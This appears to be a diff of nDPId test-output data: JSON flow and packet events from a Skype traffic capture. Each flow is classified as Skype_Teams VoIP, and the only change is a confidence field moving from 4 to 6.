+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"skype.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"skype.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"skype.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1431969654389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431969654389,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2ttcAAEARMM7AqAEinTg0DzLdnFsAIgnVm6IClklzvpwg0J9RRu2barB5pBf+dP\/198s="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"skype.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"skype.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"skype.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"skype.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1431969654389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969654389,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6uggAAEARpzfAqAEiQAQXpTLdnFQAJvWzm6QCh3CXl6XGrqArz4Fq72vdiruIePdvscfnf8nL"} 
-00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"skype.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"skype.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":515,"source":"skype.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969655399,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"skype.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1431969655399,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969655399,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+KmIAAEARBSXAqAEi1cezljLdnEQAKk92m6YCxHNRXNt6saUbXJuaVxAVloiUB3Kd06UQ7eXoZ8Yw\/Q=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"skype.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969655399,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"skype.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969655399,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"skype.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969655399,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"skype.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1431969655399,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969655399,"pkt":"0NQSxnP1PBXCt3IOCABFAAAysnAAAEARTIvAqAEib91KGDLdnEEAHsG9m6gCfNYVHSc6jWjicVy5t1mw5NpUpQ=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"skype.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969655399,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"skype.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969655399,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":517,"source":"skype.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"skype.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1431969655400,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431969655400,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9FyIAAEAR57bAqAEib91KMDLdnEgAKadmm6oC656jqkVeUmOjjlOF7oTonkHhDKTP6NWeDWkwfWY5"} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"skype.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":13021,"dst_port":40008,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"skype.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":13021,"dst_port":40008,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":518,"source":"skype.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"skype.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1431969655400,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969655400,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4PBwAAEARwsfAqAEib91KKjLdnFgAJKhzm6wCYALzkzdu\/LrNPcT4NWmc+JYpVJ3L9m5YbQ=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"skype.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"skype.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":519,"source":"skype.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"skype.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1431969655400,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969655400,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1xDsAAEARa1jAqAEi1cezkjLdgQkAIXwbm64C\/E7GKHTAnqTXhScHNyy9JU+1q7MSwg=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"skype.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"skype.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969655400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":533,"source":"skype.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":533,"source":"skype.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1431969656410,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969656410,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8yZkAAEARz2bAqAEinTeCrzLdnEYAKHoim7AC0Uz4eUhtRx+U2n96ruKge0mKrTm6r7jfF82JDy4="} 
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":533,"source":"skype.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":533,"source":"skype.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":534,"source":"skype.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.162","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"skype.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1431969656410,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969656410,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+lOIAAEARTinAqAEinTc4ojLdnEQAKlJUm7IC63nFT7uUV5k0L358bPvax6aIijF38KySzDuXwNYHgA=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":534,"source":"skype.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.162","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":534,"source":"skype.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.162","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":535,"source":"skype.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"skype.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1431969656410,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969656410,"pkt":"0NQSxnP1PBXCt3IOCABFAAA43x4AAEARCHPAqAEinTg0ITLdnEsAJM3am7QChNdFtOWmIsBdiMlrk7loIt\/AHz17BjRqJg=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"skype.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"skype.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"skype.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.172","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"skype.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1431969656410,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969656410,"pkt":"0NQSxnP1PBXCt3IOCABFAABAA\/QAAEAR92XAqAEib91NrDLdnEoALEKJm7YClKE3lTfT0DUQisSOS4KG\/La+hJBP5DfxaCwxffHTvFZU"} 
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"skype.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.172","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"skype.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.172","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 